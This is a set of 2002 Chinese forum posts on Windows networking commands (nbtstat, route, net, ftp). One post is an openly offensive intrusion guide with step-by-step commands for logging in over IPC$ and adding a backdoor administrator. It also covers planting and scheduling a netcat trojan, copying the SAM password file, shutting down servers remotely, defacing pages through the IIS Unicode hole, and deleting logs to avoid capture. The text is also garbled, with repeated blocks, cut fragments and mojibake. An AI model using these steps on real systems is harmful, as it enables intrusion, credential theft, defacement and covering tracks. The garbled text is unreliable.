
2.列出缓存内容
C:/>nbtstat -c

本地连接 3:
Node IpAddress: [218.76.4.35] Scope Id: []

No names in cache

本地连接:
Node IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Remote Cache Name Table

Name Type Host Address Life [sec]
------------------------------------------------------------
WORKGROUP <20> UNIQUE 192.168.0.68 5597
从上面就可以知道你刚刚和IP为192.168.0.68的计算机的NetBIOS连接过。呵呵,不得不提一句,这个命令提供给了“黑客”在入侵了对方的主机以后进而入侵到内部网的一个有利的线索。

3.显示连接对话内容
C:\>nbtstat -S

本地连接 3:
Node IpAddress: [218.76.4.35] Scope Id: []

NetBIOS Connection Table

Local Name State In/Out Remote Host Input Output

----------------------------------------------------------------------------

ADSL1688 <03> Listening

本地连接:
Node IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Connection Table

Local Name State In/Out Remote Host Input Output

----------------------------------------------------------------------------

ADSL1688 <00> Connected Out 192.168.0.10 4MB 125KB
ADSL1688 <03> Listening
LIUQUch <03> Listening
………………………………

从上面就可以知道,该计算机现在正在和192.168.0.68进行会话,看得出是在复制文件,而且是从对方往自己的计算机里复制。(注以上显示数据部分改动过,以防万一,还是小心为妙)。

e IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADSL1688 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1E> GROUP Registered
ADSL1688 <20> UNIQUE Registered
WORKGROUP <1D> UNIQUE Registered
LIUQUch <03> GROUP Registered
ADSL1688 <03> UNIQUE Registered

MAC Address = 00-07-53-00-4E-B7
从上面就可以知道我的计算机当前计算机的NetBios名为adsl1688属于workgroup域内,当前有liuquch登陆的本计算机,呵呵,全都出来了。此参数也可nbtstat -a 192.168.0.65,显示结果和上面的相同。

2.列出缓存内容
C:/>nbtstat -c

本地连接 3:
Node IpAddress: [218.76.4.35] Scope Id: []

No names in cache

本地连接:
Node IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Remote Cache Name Table

Name Type Host Address Life [sec]
------------------------------------------------------------
WORKGROUP <20> UNIQUE 192.168.0.68 5597
从上面就可以知道你刚刚和IP为192.168.0.68的计算机的NetBIOS连接过。呵呵,不得不提一句,这个命令提供给了“黑客”在入侵了对方的主机以后进而入侵到内部网的一个有利的线索。

3.显示连接对话内容
C:\>nbtstat -S

本地连接 3:
Node IpAddress: [218.76.4.35] Scope Id: []

NetBIOS Connection Table

Local Name State In/Out Remote Host Input Output

----------------------------------------------------------------------------

ADSL1688 <03> Listening

本地连接:
Node IpAddress: [192.168.0.65] Scope Id: []

NetBIOS Connection Table

Local Name State In/Out Remote Host Input Output

----------------------------------------------------------------------------

AD

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
ROUTE
一. 基础知识
Route是用来显示、人工添加和修改路由表项目的。我们知道我们在因特网上冲浪,并不是直接和我们要访问的主机通讯,而是要通过许多的路由器。我们在用PING这个命令时就看出来了。我们就再举那个例子,比如我们要访问新浪网,它的信息传送到我们的本机上要经过11个路由,但其实它也可以选择其它的路径来到我们本机,只是因为路由器有选择最短路径的能力所以它走现在这条路了,现在假如我们已经找到了一个其他的主机,让它从肉鸡这条路上过来,我们就可以用route命令修改路由表项目,让它往我们指定的路径上过来。(写得太差劲,早到一段比较好的说明,又不想将此段删掉,留下吧)
大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。但是,当网络上拥有两个或多个路由器时,你就不一定想只依赖缺省网关了。实际上你可能想让你的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。在这种情况下,你需要相应的路由信息,这些信息储存在路由表中,每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下,必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。

usage:
ROUTE [-f] [-p] [command [destination]
[MASK netmask] [gateway] [METRIC metric] [IF interface]
-f Clears the routing tables of all gateway entries.If this is used in conjunction with one of the commands, the tables are cleared prior to running the command.(清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除)
-p When used with the ADD command, makes a route persistent across boots of the system. By default, routes are not preserved when the system is restarted. Ignored for all other commands,which always affect the appropriate persistent routes. This option is not supported in Windows 95.(该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。该选项在win95下不支持)
command One of these:
PRINT Prints a route(打印路由)
ADD Adds a route(添加路由)
DELETE Deletes a route(删除路由)
CHANGE Modifies an existing route(修改已存在的路由)
destination Specifies the host.(指定主机)
MASK Specifies that the next parameter is the 'netmask' value.
netmask Specifies a subnet mask value for this route entry.If not specified, it defaults to 255.255.255.255.(指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255)
gateway Specifies gateway.(指定网关)
interface the interface number for the specified route.
METRIC specifies the metric, ie. cost for the destination.(指定跳数)

All symbolic names used for destination are looked up in the network database file NETWORKS. The symbolic names for gateway are looked up in the host name database file HOSTS.If the command is PRINT or DELETE. Destination or gateway can be a wildcard,(wildcard is specified as a star '*'), or the gateway argument may be omitted.(名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数)

二.实例

这个命令不太好贴出来,举例说明吧。

1.tracert -d http://www.sina.com.cn/
显示my host到http://www.sina.com.cn/所经过的所有路由途径。显示有途径11个路由。
2.显示路由表中的当前项:
C:/>route print
=======================================================================
Interface List
…………………………

和netstat -r显示路由信息的结果差不多。

3.把路由项目添加给路由表:route add
假设:新浪网的IP地址是61.145.113.87,我们到达它要经过11个路由,我们刚开始找到的那个主机,说明白点就是肉鸡的ip为xxx.xxx.xxx.xxx,子网掩码为255.255.255.224。我们就可以这样达到我们的目的:

route add 61.145.113.87 mask 255.255.255.224 xxx.xxx.xxx.xxx metric 11

4.修改数据的传输路由:route change
此参数能够改变数据的传输路由,但不能改变数据的目的地。
一样的道理,我们可自己选择一条更短的路径来访问。比如我们刚才让它绕到很远去访问新浪网,现在我又不想绕这么大的弯了。于是具体操作如下:

route add 61.145.113.87 mask 255.255.255.224 61.187.255.81 metric 4

四个路由当然比十一个路由要快得多,是不是?

5.从路由表中删除路由:route delete

t supported in Windows 95.(该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。该选项在win95下不支持)
command One of these:
PRINT Prints a route(打印路由)
ADD Adds a route(添加路由)
DELETE Deletes a route(删除路由)
CHANGE Modifies an existing route(修改已存在的路由)
destination Specifies the host.(指定主机)
MASK Specifies that the next parameter is the 'netmask' value.
netmask Specifies a subnet mask value for this route entry.If not specified, it defaults to 255.255.255.255.(指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255)
gateway Specifies gateway.(指定网关)
interface the interface number for the specified route.
METRIC specifies the metric, ie. cost for the destination.(指定跳数)

All symbolic names used

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
net
这个命令的语法是: 可用的命令包括:
NET ACCOUNTS NET HELP NET SHARE
NET COMPUTER NET HELPMSG NET START
NET CONFIG NET LOCALGROUP NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出用户可以启动的网络服务。
NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。
NET HELP command MORE 用于逐屏显示帮助。


a.net view

这个命令的语法是:NET VIEW [computername /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [computername]

NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,
它就会显示当前域或网络上的计算机上的列表。

computername 指用户希望浏览其共享资源的计算机。
/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,
就会显示局域网络上的所有域。
/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算
机名,就会显示NetWare 网络中那个计算机上的可用资源。

至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行
net view ***.***.**.*** 就可以了


b.net use

这个命令的语法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
[/USER:[domainname]username]
[[/DELETE] [/PERSISTENT:{YES NO}]]

NET USE [devicename *] [password *]] [/HOME]

NET USE [/PERSISTENT:{YES NO}]


NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的
连接。当不带选项使用本命令时,它会列出计算机的连接。

devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型
的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入
一个星号来代替一个指定的设备名可以分配下一个可用设备名。

computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,
就要将双反斜线 () 和计算机名一起用引号 (" ")括起来。计算机名
可以有1 到15 个 字符。

sharename 指共享资源的网络名字。
volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务
(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务
器) 并使之与NetWare 服务器相连。
password 指访问共享资源所需要的密码。


* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。
/USER 指定连接时的一个不同的用户名。
domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。
username 指定登录的用户名。
/HOME 将用户与他们的宿主目录相连。
/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。
YES 在连接产生时保存它们,并在下次登录时恢复它们。
NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被
恢复。可以使用 /DELETE 选项开关来删除永久连接。
NET STATISTICS
NET CONFIG SERVER NET NAME NET STOP
NET CONFIG WORKSTATION NET PAUSE NET TIME
NET CONTINUE NET PRINT NET USE
NET FILE NET SEND NET USER
NET GROUP NET SESSION NET VIEW

NET HELP SERVICES 列出用户可以启动的网络服务。
NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。
NET HELP command MORE 用于逐屏显示帮助。


a.net view

这个命令的语法是:NET VIEW [computername /DOMAIN[:domainname]]
NET VIEW /NETWORK:NW [computername]

NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,
它就会显示当前域或网络上的计算机上的列表。

computername 指用户希望浏览其共享资源的计算机。
/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,
就会显示局域网络上的所有域。
/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算
机名,就会显示NetWare 网络中那个计算机上的可用资源。

至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行
net view ***.***.**.*** 就可以了


b.net use

这个命令的语法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
[/USER:[domainname]username]
[[/DELETE] [/PERSISTENT:{YES NO}]]

NET USE [devicename *] [password *]] [/HOME]

NET USE [/PERSISTENT:{YES NO}]


NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的
连接。当不带选项使用本命令时,它会列出计算机的连接。

devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型
的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入
一个星号来代替一个指定的设备名可以分配下一个可用设备名。

computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,
就要将双反斜线 () 和计算机名一起用引号 (" ")括起来。计算机名
可以有1 到15 个 字符。

sharename 指共享资源的网络名字。
volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务
(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务
器) 并使之与NetWare 服务器相连。
password 指访问共享资源所需要的密码。


* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。
/USER 指定连接时的一个不同的用户名。
domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。
username 指定登录的用户名。
/HOME 将用户与他们的宿主目录相连。
/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。
/PERSISTENT 控制

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
一般黑客入侵所需要的几个常用命令
如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。

1:NET

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1

net use //127.0.0.1/ipc$ "123456" /user:"hbx"

退出的命令是

net use //127.0.0.1/ipc$ /delte

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z://127.0.0.1/c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

net user guest lovechina

net命令果然强大啊!

2:at

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

那么需要用AT命令,这里假设你已经登陆了那个服务器。

你首先要得到对方的时间,

net time //127.0.0.1

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

at //127.0.0.1 12:3 nc.exe

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,?..,以及FTP服务器.

在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321

ftp http://www.51.net/

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/

put c:/index.htm d:/

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

get c:/index.htm d:/

5:copy

下嫖宜邓翟跹驯镜氐奈募粗频蕉苑接才躺先ィ枰⒑肐PC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm //127.0.0.1/c$/index.htm

----------------------

如果你要复制到D盘下把C改为D,就行了!

copy index.htm //127.0.0.1/d$/index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

copy index.htm //127.0.0.1/admin$/index.htm

admin$是winnt

----------------------

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:/winnt/repair/sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy //127.0.0.1/admin$/repair/sam._ c:/

----------------------

6:set

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

下面是我得到的结果!我来分析它,只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:/WINNT/system32/cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:/WINNT/system32/os2/dll;
OS=Windows_NT
Path=D:/WINNT/system32;D:/WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:/vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:/vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:/WINNT
TZ=GMT-9
USERPROFILE=D:/WINNT/Profiles/Default User
windir=D:/WINNT

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

7:nbtstat

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

命令是

nbtstat -A XXX.XXX.XXX.XXX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

这里的用户是PENTIUMII。

8:Shutdown

关了对方的NT服务器的命令

Shutdown //IP地址 t:20

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

9:DIR

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10:echo

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

1、首先,我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

具体的做法:
输入 echo open upload.chinaren.com> c:/cnhack.txt
输入 echo cnhack >> c:/cnhack.txt
输入 echo 39abs >> c:/cnhack.txt
输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

等命令完成时,文件已经下载到你指定的文件里了。

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

记得要 del c:/cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

NT的日志有这些

del C:/winnt/system32/logfiles/*.*
del C:/winnt/ssytem32/config/*.evt
del C:/winnt/system32/dtclog/*.*
del C:/winnt/system32/*.log
del C:/winnt/system32/*.txt
del C:/winnt/*.txt
del C:/winnt/*.log

AHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

这里的用户是PENTIUMII。

8:Shutdown

关了对方的NT服务器的命令

Shutdown //IP地址 t:20

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

9:DIR

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10:echo

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

1、首先,我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:/inetpub/wwwroot/index.htm(这里是把你空间上的index.htm下载到对方的c:/inetpub/wwwroot/index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

具体的做法:
输入 echo open upload.chinaren.com> c:/cnhack.txt
输入 echo cnhack >> c:/cnhack.txt
输入 echo 39abs >> c:/cnhack.txt
输入 echo get index.htm c:/inetpub/wwwroot/index.htm+>>+c:/cnhack.txt
最后输入 ftp -s:c:/cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

等命令完成时,文件已经下载到你指定的文件里了。

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

记得要 del c:/cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦

----------------------------------------------------------

作者: 老虎
日期: 2002-11-09
内容:
FTP命令大全及其应用
FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下 使用FTP,都会遇到大量的FTP内部命令,熟悉并灵活应用FTP的内部命令,可以大大方便 使用者,对于现在拨号上网的用户,如果ISP提供了shell可以使用nohup,那么ftp将是 你最省钱的上download方式,ftp的命令行格式为:ftp -v -d -i -n -g[主机名]   -v 显示远程服务器的所有响应信息。
  -d 使用调试方式。
   -n 限制ftp的自动登录,即不使用.netrc文件。
   -g 取消全局文件名。
  ftp使用的内部命令如下(其中括号表示可选项):   1.![cmd[args]]在本地机中执行交互shell、exit回到ftp环境,如!ls*.zip。
  2.¥ macro-ame[args]执行宏定义macro-name。
  3.account[password]提供登录远程系统成功后访问系统资源所需的补充口令。
  4.appendlocal-file[remote-file]将本地文件追加到远程系统主机,若未指定

远程系统文件名,则使用本地文件名。
  5.ascii 使用ascii类型传输方式。
  6.bell每个命令执行完毕后计算机响铃一次。
  7.bin使用二进制文件传输方式。
  8.bye退出ftp会话过程。
  9.case在使用mget时,将远程主机文件名中的大写转为小写字母。
  10.cd remote-dir 进入远程主机目录。
  11.cdup进入远程主机目录的父目录。
  12.chmod modefile-name将远程主机文件file-name的存取方式设置为mode,如

chmod 777 a.out。
  13.close中断与远程服务器的ftp会话(与open对应)。
  14.cr使用asscii方式传输文件时,将回车换行转换为回行。
  15.delete remote-file删除远程主机文件。
  16.debug[debug-value]设置调试方式,显示发送至远程主机的每条命令,如debu p
3,若 设为0,表示取消debug。
  17.dir[remote-dir][local-file]显示远程主机目录,并将结果存入local-
file。
  18.disconnection同close。
  19.form format将文件传输方式设置为format,缺省为file方式。
  20.getremote-file[local-file]将远程主机的文件remote-file传至本地硬盘的local-file。
  21.glob设置mdelete、mget、mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
  22.hash每传输1024字节,显示一个hash符号(#)。
  23.help[cmd]显示ftp内部命令cmd的帮助信息,如help get。
  24.idle[seconds]将远程服务器的休眠计时器设为[seconds]秒。
   25.image设置二进制传输方式(同binary)
   26.lcd[dir]将本地工作目录切换至dir。
   27.ls[remote-dir][local-file]显示远程目录remote-dir,并存入本地loca l
-file。
   28.macdef macro-name定义一个宏,遇到macdef下的空行时,宏定义结束。
   29.mdelete[remote-file]删除远程主机文件。
   30.mdir remote-files local-file与dir类似,但可指定多个远程文件,如mdi r
*.o.*. zipoutfile。
   31.mget remote-files传输多个远程文件。
   32.mkdir dir-name 在远程主机中建一目录。
   33.mls remote-file local-file同nlist,但可指定多个文件名。
   34.mode[mode-name]将文件传输方式设置为mode-name,缺省为stream方式。

   35.modtime file-name显示远程主机文件的最后修改时间。
   36.mput local-file将多个文件传输至远程主机。
   37.newerfile-name如果远程机中file-name的修改时间比本地硬盘同名文件的

时间更近,则重传该文件。
   38.nlist[remote-dir][local-file]显示远程主机目录的文件清单,并存入本地硬盘的local-file。
   39.nmap[inpatternoutpattern]设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如nmap¥1.¥2.¥3[¥1,¥2].[¥2,¥3],则传输文件a1.a2.a3时 ,文件名变为a1、a2,该命令特别适用于远程主机为非U-NIX机的情况。
   40.ntrans[inchars[outchars]]设置文件名字符的翻译机制,如ntrans1R,则文件

名LL L将变为RRR。
   41.open host[port]建立指定ftp服务器连接,可指定连接端口。
   42.passive进入被动传输方式。
   43.prompt设置多个文件传输时的交互提示。
   44.proxyftp-cmd在次要控制连接中,执行一条ftp命令,该命令允许连接两个ft p
服务器,以在两个服务器间传输文件。第一条ftp命令必须为open,以首先建立两个服务

器间的连接。
   45.put local-file[remote-file]将本地文件local-file传送至远程主机。

   46.pwd显示远程主机的当前工作目录。
   47.quit同bye,退出ftp会话。
   48.quote arg1,arg2……将参数逐字发至远程ftp服务器,如quote syst。
   49.recv remote-file[local-file]同get。
   50.regetremote-file[local-file]类似于get,但若local-file存在,则从上

次传输中断处续传。
   51.rhelp[cmd-name]请求获得远程主机的帮助。
   52.rstatus[file-name]若未指定文件名,则显示远程主机的状态,否则显示文件

状态。
   53.rename[from][to]更改远程主机文件名。
   54.reset清除回答队列。
   55.restart marker从指定的标志marker处,重新开始get或put,如restart 130。


   56.rmdir dir-name删除远程主机目录。
   57.runique设置文件名唯一性存储,若文件存在,则在原文件后加后缀。
   58.send local-file[remote-file]同put。
   59.sendport设置PORT命令的使用。
   60.site arg1,arg2……将参数作为SITE命令逐字发送至远程ftp主机。
   61.size file-name显示远程主机文件大小,如site idle 7200。
   62.status显示当前ftp状态。
   63.struct[struct-name]将文件传输结构设置为struct-name,缺省时使用
stream结构。
64.sunique将远程主机文件名存储设置为唯一(与runique对应)。
   65.system显示远程主机的操作系统类型。
   66.tenex将文件传输类型设置为TENEX机所需的类型。
   67.tick设置传输时的字节计数器。
   68.trace设置包跟踪。
   69.type[type-name]设置文件传输类型为type-name,缺省为ascii,如
typebinary,设置 二进制传输方式。
   70.umask[newmask]将远程服务器的缺省umask设置为newmask,如umask 3。
   71.useruser-name[password][account]向远程主机表明自己的身份,需要口令

时,必须输入口令,如user anonymous my@email。
   72.verbose同命令行的-v参数,即设置详尽报告方式,ftp服务器的所有响应都将

显示给用户,缺省为on.
   73.?[cmd]同help。
